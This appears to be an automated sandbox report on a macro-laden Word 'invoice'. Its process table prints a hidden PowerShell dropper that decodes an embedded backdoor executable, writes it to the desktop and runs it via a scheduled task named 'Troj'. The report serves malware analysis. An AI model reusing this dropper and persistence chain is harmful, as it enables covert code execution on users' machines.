File name: | RS4_WinATP-Intro-Invoice.docm |
Full analysis: | https://app.any.run/tasks/f5a94796-e353-42f8-baec-3409233611b6 |
Verdict: | Malicious activity |
Analysis date: | October 20, 2020, 13:13:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/encrypted |
File info: | CDFV2 Encrypted |
MD5: | 8D61637E5F745229F28E6FED9E54FF1A |
SHA1: | 55717093C9B5DD31E2C30855952367F7D29116B6 |
SHA256: | B94C4B6A7010288D98E3F3DEC79B9EC5285A444B046C8F29ABEABF17FBE29138 |
SSDEEP: | 3072:LGIkTJkWFjoyJvyUWlu5gqRU9AU6JiI2JAEJD6BofiQlMUWp5uL:qT6WyyDW05gqiGv8I2BJD6SfXWuL |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2364 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\RS4_WinATP-Intro-Invoice.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
1336 | "C:\Windows\system32\notepad.exe" | C:\Windows\system32\notepad.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3144 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3712 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\RS4_WinATP-Intro-Invoice.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2476 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden -Exec Bypass -Command cd /;$fileBase64Prefix = '';$fileBase64Prefix= $fileBase64Prefix + 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYCACbMsFoAAAAAAAAAAPAAIgALAjAAABYAAAAGAAAAAAAAAAAAAAAgAAAAAABAAQAAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAABgAAAAAgAAAAAAAAMAYIUAAEAAAAAAAABAAAAAAAAAAAAQAAAAAAAAIAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAABAAADMBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxDMAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';$fileBase64Prefix= $fileBase64Prefix + 'AAAAgAABIAAAAAAAAAAAAAAAudGV4dAAAAPwUAAAAIAAAABYAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAADMBAAAAEAAAAAGAAAAGAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIAAAAAgAFABAjAAC0EAAAAQAAAAsAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeAnsBAAAEKiICA30BAAAEKh4CewIAAAQqIgIDfQIAAAQqHgJ7AwAABCoiAgN9AwAABCoAEzAFADcAAAABAAARAnsGAAAEcgEAAHB+BAAABBIA/hUCAAACEgADKAIAAAYSAAQoBAAABhIABSgGAAAGBm8BAAArKnYCchkAAHAefgUAAARzCwAACn0GAAAEAigMAAAKKgAAABMwBABOAAAAAgAAER';$fileBase64Prefix= $fileBase64Prefix + 'IA/hUNAAABEgAbKA0AAAoSACEAAAAAACAAACgOAAAKEgAgAAAgACgPAAAKBoAEAAAEGI0WAAABJRZyZwAAcKIlF3J7AABwooAFAAAEKgAAEzAFAE8AAAADAAARfgoAAAQXaliACgAABAQsF3LJAABwBG8QAAAKcuEAAHAoEQAACisFcuUAAHAKfgkAAAR/CgAABHLnAABwKBIAAAoCAwYoEwAACm8HAAAGKgAbMAMALwEAAAQAABEXcu0AAHAUKAoAAAYWCigUAAAKcgsBAHAoFQAACigWAAAKbxcAAApzGAAACn4IAAAEKBkAAAoK3gMm3gB+GgAACnKeAQBwbxsAAAoLBy0QfhoAAApyngEAcG8cAAAKCwdyAgIAcG8dAAAKLC9zHgAACiUXbx8AAAolcgwCAHBvIAAACiVyHAIAcG8hAAAKKCIAAAomHzIoIwAACgdyAgIAcG8dAAAKLAcfZCgjAAAKcx4AAAolF28fAAAKJXIMA';$fileBase64Prefix= $fileBase64Prefix + 'gBwbyAAAAolcr0CAHBvIQAACigiAAAKJgYsOHLkAwBwcv4DAHAoJAAACiZzHgAACiUXbx8AAAolcgwCAHBvIAAACiVyHAIAcG8hAAAKKCIAAAomF3ImBABwFCgKAAAGckgEAHAoJQAACigmAAAKJioAARAAAAAADgArOQADDAAAAR4CKAwAAAoqhnKyBABwcxgAAAqACAAABHMIAAAGgAkAAAQWaoAKAAAEKgAAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAAZAQAACN+AADQBAAAKAUAACNTdHJpbmdzAAAAAPgJAADMBAAAI1VTAMQOAAAQAAAAI0dVSUQAAADUDgAA4AEAACNCbG9iAAAAAAAAAAIAAAFXHaIBCQgAAAD6ATMAFgAAAQAAACAAAAAEAAAACgAAAA0AAAAKAAAAJgAAAAIAAAARAAAABAAAAAEAAAADAAAABgAAAAEAAAACAAAAAQAAAAAAFAIB';$fileBase64Prefix= $fileBase64Prefix + 'AAAAAAAGAMcBFgQGAOcBFgQGAGkByQMPADYEAAAGAH0B9wMGAFsB9wMGAKoBFQMGAJEBSQIGAC0BHQIGAAwB3wIGAEABFgQGALEE3wIGAHEEHQIGAK4AHQIGAA0D3wIGADcD3wIGAP0EAQAGAFgEHQIGAJECHQIGAOkDHQIGAE4EHQIGAHIC3wIGABEA3wIGALgE3wIGAH0CQwAKAF0DyQMGAB0FAQAKAHwDyQMKAIQEyQMGAFYAOAIGAOUA3wIGAI0D3wIAAAAAOgAAAAAAAQABAAkBEADTACMAKQABAAEAAQAQAKgAIwAxAAQABwAAABAA1wIjADEABwAKAAEAXQDMAAEAdADPAAEAkgDMABYAJwPSADEAjATWAAEAQgTaAFaAYwLMABEAGADeABEApwPiABEA5gLmAEggAAAAAIYIugBSAAEAUCAAAAAAhgjEABUAAQBZIAAAAACGCJwC6QACAGEgAAAAAIYIrQIQAAIAaiAAAAA';$fileBase64Prefix= $fileBase64Prefix + 'AhghLA1IAAwByIAAAAACGCFQDFQADAHwgAAAAAIYAzgDtAAQAvyAAAAAAhhi8AwYABwDgIAAAAACRGMID9AAHADwhAAAAAJEAFgH4AAcAmCEAAAAAlgD9AgABCgDkIgAAAACGGLwDBgALAOwiAAAAAJEYwgP0AAsAAAABAA4CAAABAA4CAAABAA4CAAABAN8AAAACAMsCAAADAJwDAAABAL4CAAACAHkCEBADAEEDAAABAGwECQC8AwEAEQC8AwYAGQC8AwoAKQC8AxAAMQC8AxUAOQC8AxUAQQC8AxUASQC8AwYAWQC8AwYAcQAnAR8AcQC8Ay4AYQC8AwYAaQCHAjwAaQDcA0IAaQBFBEgAYQBwAlIAsQCqBFYAuQBwAl0AsQCqBGIAwQAJBW4AyQAEAWIA0QBtA3IA0QACA1IAeQC8AxUAeQDxAngA2QCwA4AAiQDqBIQAiQDdBIQAiQAFAooA4QC8AwYA4QDKBBAA4QDtABUA4Q';$fileBase64Prefix= $fileBase64Prefix + 'CcBBUA6QDEBI8A8QChA5YA6QDEBJsA+QD6AKIA+QD1BKcADgAcALYAEgAlAMcAIABLAMYBIQBLAMYBLgALAA4BLgATABcBLgAbADYBLgAjAD8BLgArAEUBLgAzAG8BLgA7AHwBQABLAMYBQQBLAMYBQwBDAMsBYABLAMYBYQBLAMYBgABLAMYBoABLAMYBwABLAMYBGgA3AE4AaAACAAEAAADZAAYBAACxAgoBAACXAwYBAgABAAMAAQACAAMAAgADAAUAAQAEAAUAAgAFAAcAAQAGAAcABIAAAAEAAAAAAAAAAAAAAAAAggIAAAQAAAAAAAAAAAAAAK0ATQAAAAAABAAAAAAAAAAAAAAArQDfAgAAAAAVACkAAAAATWljcm9zb2Z0LldpbjMyAFVJbnQ2NABzX3NlbnNlUlM0AFdpbkFUUEludHJvQmFja2Rvb3JSUzQAPE1vZHVsZT4AU3lzdGVtLklPAG1zY29ybGliAFRocmVhZ';$fileBase64Prefix= $fileBase64Prefix + 'AA8U3RhZ2U+a19fQmFja2luZ0ZpZWxkADxJc1N1Y2Nlc3NmdWw+a19fQmFja2luZ0ZpZWxkADxJbmZvPmtfX0JhY2tpbmdGaWVsZABUcmFjZQBFdmVudFNvdXJjZQBnZXRfU3RhZ2UAc2V0X1N0YWdlAFRyYWNlQXR0YWNrU3RhZ2UAc3RhZ2UAQ29uc29sZQBzZXRfRmlsZU5hbWUAV3JpdGVMaW5lAENvbWJpbmUAVmFsdWVUeXBlAFRyYWNlQXR0YWNrUGhhc2UAV3JpdGUARXZlbnREYXRhQXR0cmlidXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAENvbXBpbGF0aW9u';$fileBase64Prefix= $fileBase64Prefix + 'UmVsYXhhdGlvbnNBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAR2V0VmFsdWUAdmFsdWUAVHJvai5leGUAU3lzdGVtLkRpYWdub3N0aWNzLlRyYWNpbmcAU3lzdGVtLlRocmVhZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAGNfbG9maVN0cmluZwBUb1N0cmluZwBtc2cAUGF0aABUcm9qAHNldF9MZXZlbABFdmVudExldmVsAGdldF9Jc1N1Y2Nlc3NmdWwAc2V0X0lzU3VjY2Vzc2Z1bABpc1N1Y2Nlc3NmdWwAaXN1Y2Nlc3NmdWwAUHJvZ3JhbQBTeXN0ZW0Ac190cmFjZU51bQBvcF9MZXNzVGhhbgBNYWluAGdldF9Qcm9kdWN0VmVyc2lvbgBTeXN0ZW0uUmVmbGVjdGlvbgBUZWxlbWV0cnlPcHRpb24ARXhjZXB0aW9uAGV4Y2VwdGl';$fileBase64Prefix= $fileBase64Prefix + 'vbgBnZXRfSW5mbwBzZXRfSW5mbwBGaWxlVmVyc2lvbkluZm8AR2V0VmVyc2lvbkluZm8AUHJvY2Vzc1N0YXJ0SW5mbwBDb25zb2xlS2V5SW5mbwBpbmZvAFNsZWVwAHNfbG9nZ2VyAEN1cnJlbnRVc2VyAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAc2V0X0tleXdvcmRzAEV2ZW50S2V5d29yZHMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMAc2V0X1RhZ3MARXZlbnRUYWdzAEV2ZW50U291cmNlU2V0dGluZ3MAYXJncwBFdmVudFNvdXJjZU9wdGlvbnMAUHJvY2VzcwB0ZWxlbWV0cnlUcmFpdHMAc2V0X0FyZ3VtZW50cwBDb25jYXQAT2JqZWN0AEVudmlyb2';$fileBase64Prefix= $fileBase64Prefix + '5tZW50AFN0YXJ0AHNldF9DcmVhdGVOb1dpbmRvdwBDcmVhdGVTdWJLZXkAT3BlblN1YktleQBSZWFkS2V5AFJlZ2lzdHJ5S2V5AGdldF9TeXN0ZW1EaXJlY3RvcnkAUmVnaXN0cnkAAAAAF0EAdAB0AGEAYwBrAFMAdABhAGcAZQAATU0AaQBjAHIAbwBzAG8AZgB0AC4AVwBpAG4AZABvAHcAcwAuAFMAZQBuAHMAZQAuAEEAdAB0AGEAYwBrAFMAYwBlAG4AYQByAGkAbwAAE0UAVABXAF8ARwBSAE8AVQBQAABNewA1AEUAQwBCADAAQgBBAEMALQBCADkAMwAwAC0ANAA3AEYANQAtAEEAOABBADQALQBFADgAMgA1ADMANQAyADkARQBEAEIANwB9AAEXRQB4AGMAZQBwAHQAaQBvAG4AOgAgAAADLgAAAQAFRAAyAAAdQQB0AHQAYQBjAGsAIABzAHQAYQByAHQAZQBkAACAk';$fileBase64Prefix= $fileBase64Prefix + 'UMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAQQBkAHYAYQBuAGMAZQBkACAAVABoAHIAZQBhAHQAIABQAHIAbwB0AGUAYwB0AGkAbwBuAFwATQBzAFMAZQBuAHMAZQAuAGUAeABlAABjUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4ATwBuAGMAZQAACVQAcgBvAGoAAA9jAG0AZAAuAGUAeABlAACAny8AYwAgAFIARQBHACAARABFAEwARQBUAEUAIABIAEsAQwBVAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBl';$fileBase64Prefix= $fileBase64Prefix + 'AG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4ATwBuAGMAZQAgAC8AZgAgAC8AdgAgAFQAcgBvAGoAAIElLwBjACAAUgBFAEcAIABBAEQARAAgAEgASwBDAFUAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgBPAG4AYwBlACAALwBmACAALwB2ACAAVAByAG8AagAgAC8AdAAgAFIARQBHAF8ARQBYAFAAQQBOAEQAXwBTAFoAIAAvAGQAIABeACUAdQBzAGUAcgBwAHIAbwBmAGkAbABlAF4AJQBcAGQAZQBzAGsAdABvAHAAXABXAGkAbgBBAFQAUAAtAEkAbgB0AHIAbwAtAEIAYQBjAGsAZABvAG8AcgAuAGUAeABlAAEZcwBjAGgAdABhAHMAawBzAC4AZQB';$fileBase64Prefix= $fileBase64Prefix + '4AGUAACcvAGQAZQBsAGUAdABlACAALwBUAE4AIABUAHIAbwBqACAALwBGAAAhQQB0AHQAYQBjAGsAIABmAGkAbgBpAHMAaABlAGQALgAAaUEAdAB0AGEAYwBrACAAcwBjAGUAbgBhAHIAaQBvACAAYwBvAG0AcABsAGUAdABlAGQAIAAKAFAAcgBlAHMAcwAgAGEAbgB5ACAAawBlAHkAIAB0AG8AIABjAGwAbwBzAGUALgAuAC4AABcxADAALgA0ADgAMwAwAC4AMAAuADAAAAAAMDGeN5T9TEeNZl5pUmLqYAAEIAEBCAMgAAEFIAEBEREEIAEBAgQgAQEOBAcBEQgJMAEDAQ4RNR4ABAoBEQgIIAMBDhFJHQ4EBwERNQUgAQERTQUgAQERUQUgAQERVQMHAQ4DIAAOBgADDg4ODgQgAQ4OBQACDg4OBQcCAhJFAwAADgUAARJpDgcAAgISPRI9AwYSRQUgARJFDgQgARwOBgABEn';$fileBase64Prefix= $fileBase64Prefix + 'UScQQAAQEIBgACEnUODgQAAQEOBQAAEYCBCLd6XFYZNOCJEFQAcgBvAGoALgBlAHgAZQAEAAAAAAIGDgIGAgMGETUDBh0OAwYSOQMGEj0DBhIMAgYLAyAAAgYgAwEOAg4DAAABBwADAQIOEkEFAAEBHQ4DKAAOAygAAggBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAFAQAAAAApAQAkNjg4ZjViMWUtY2FhNi00YWJlLWFkZGUtYTQ1YzQ0YWE3YmYwAAAMAQAHMS4wLjAuMAAASQEAGi5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC42AQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRIuTkVUIEZyYW1ld29yayA0LjYEAQAAABEBAAEAVA4ETmFtZQVTdGFnZQAAAAAAAAAmzLBaAAAAAAIAAAAcAQAA4DMAAOAVAABSU0RTb3U0m6zI0UeqE';$fileBase64Prefix= $fileBase64Prefix + 'Cosvclp8QEAAABDOlxkZXZcUmVwb3NcRElZXFdpbkFUUEludHJvQmFja2Rvb3JSUzRcb2JqXFJlbGVhc2VcVHJvai5wZGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';$fileBase64Prefix= $fileBase64Prefix + 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACABAAAAAgAACAGAAAAFAAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAGgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAMwCAACQQAAAPAIAAAAAAAAAAAAAPAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAAAAAABAA';$fileBase64Prefix= $fileBase64Prefix + 'AAAEAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAHgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAAMgAJAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABUAHIAbwBqAC4AZQB4AGUAAAAAACgAAgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAACAAAAA6AAkAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAVAByAG';$fileBase64Prefix= $fileBase64Prefix + '8AagAuAGUAeABlAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAADcQgAA6gEAAAAAAAAAAAAA77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KDQo8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBtYW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDxhc3NlbWJseUlkZW50aXR5IHZlcnNpb249IjEuMC4wLjAiIG5hbWU9Ik15QXBwbGljYXRpb24uYXBwIi8+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzL';$fileBase64Prefix= $fileBase64Prefix + 'W1pY3Jvc29mdC1jb206YXNtLnYyIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcyB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjMiPg0KICAgICAgICA8cmVxdWVzdGVkRXhlY3V0aW9uTGV2ZWwgbGV2ZWw9ImFzSW52b2tlciIgdWlBY2Nlc3M9ImZhbHNlIi8+DQogICAgICA8L3JlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgPC9zZWN1cml0eT4NCiAgPC90cnVzdEluZm8+DQo8L2Fzc2VtYmx5PgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';$fileBase64Suffix= 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';if (Test-Path env:computername) { $fileBase64Hash= [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($env:computername)).Replace('=','A')} else { $fileBase64Hash = 'AAAA' };$fileBase64= $fileBase64Prefix + $fileBase64Hash + $fileBase64Suffix;$file= [Convert]::FromBase64String([string]$fileBase64);$filename= 'WinATP-Intro-Backdoor.exe';$desktop=[Environment]::GetFolderPath('Desktop');$fullpath = Join-path $desktop $filename;[io.file]::WriteAllBytes($fullpath,$file);copy $fullpath $desktop;schtasks /create /SC ONCE /TN Troj /TR $fullpath /ST (Get-Date).AddMinutes(-2).ToString('HH:mm') /F;$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;Set-ScheduledTask -TaskName 'Troj' -Settings $settings;schtasks /run /TN Troj | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2336 | "C:\Windows\system32\schtasks.exe" /create /SC ONCE /TN Troj /TR C:\Users\admin\Desktop\WinATP-Intro-Backdoor.exe /ST 14:13 /F | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3312 | "C:\Windows\system32\schtasks.exe" /run /TN Troj | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3F50.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF51FBC9A8ADE44E4C.TMP | — | |
MD5:— | SHA256:— | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF41E12293740D5BE7.TMP | — | |
MD5:— | SHA256:— | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFB25F48D52142082D.TMP | — | |
MD5:— | SHA256:— | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{74C264D5-83B3-47DB-93B1-0E449E7A3602}.tmp | — | |
MD5:— | SHA256:— | |||
3712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC870.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFC1CD2B05518FA9BD.TMP | — | |
MD5:— | SHA256:— | |||
3712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF59703CA31D781D20.TMP | — | |
MD5:— | SHA256:— | |||
3712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\msoDBCA.tmp | — | |
MD5:— | SHA256:— | |||
3712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF3C5714AC1E812F7F.TMP | — | |
MD5:— | SHA256:— |